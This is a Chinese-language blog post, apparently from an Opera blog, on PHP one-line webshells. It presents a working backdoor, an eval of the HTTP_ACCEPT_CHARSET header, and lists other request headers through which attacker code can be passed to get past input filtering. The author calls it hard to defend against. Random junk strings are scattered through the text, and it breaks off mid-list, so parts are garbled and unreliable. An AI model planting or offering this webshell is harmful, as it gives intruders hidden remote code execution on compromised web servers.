这篇文章大概是涉及到了web,注入,一句话木马,很多人觉得做脚本小子,黑别人网站有点低级和为之不齿.更多名门正派老字号的黑客都不削于这种技术....哈哈 zZiga q"
其实我个人也这么认为,可是俺是年轻人,思想比较浮躁和喜欢新鲜,加之俺又活在这个新生事物频发的年代,多少也要接触这些好的差的..好在对此研究也仅限于了解的目标.并不到为之痴狂的地步... tw&biLM5T
哎呀,废话说的太多了,opera的blog没有摘要功能,所以没偏杂文还是尽量简短一点好.... M!
uE#|
lGX8kAv?
什么是一句话木马我就不说了哈.... .Kssc lSD1
传统的一句话木马如果碰到这台机器刚刚好升级,或者因为发现被入侵,装了一套过滤系统,这台机器上的一句话木马基本上成了残废,因为这个时候入侵者的代码数据无法上传到一句话木马,无法运行,也就没了这个功能了. 838@jip
不过我不知道大家为什么这么久都没发现有一个地方,其实一直存在着漏洞,如果用在一句话木马上,一句话木马的前途将会非常光明.任何的过滤系统都不能够阻挡你的执行数据的目的,就算他的get,post,cookie,xml,rss全部严格过滤也无济于事.甚至,这个方法将很难有有效的防治办法.下面介绍这个办法.其实很简单. 3PEW0b*]Pf
]EEac
说起发现这个方法,起码有个两年的时间了,有的时候要想要发出来又因为当时没有时间而过后又忘记了. &J,&>CFc
先看一段代码: 8YO` TgW
T26'b .
<? GhW{6.^
//$_SERVER里面可以是以下几个: uOb}R
//HTTP_ACCEPT Z+
)<FX
//HTTP_ACCEPT_CHARSET -Hg,:re2
//HTTP_ACCEPT_ENCODING gCM(h[7A
//HTTP_ACCEPT_LANGUAGE m,r>E%;Cj
//HTTP_CONNECTION Q;=3vUN
//HTTP_HOST te&p1F
//HTTP_REFERER ?e[]UO
//HTTP_USER_AGENT |qtZb}"|
?> J+YoAf`hi
#X*=oG
<?eval($_SERVER["HTTP_ACCEPT_CHARSET"]);?> Go PK. E$
2 5Ia
放出这个,肯定很多人就明白了.就是利用http头的一些信息附带你的数据上去,作为一句话木马执行的参数. =HHb ]JE
不过明白的这些人肯定会有以下几个问题: }XfRKGQw
1.为什么说很难被防止. {#&j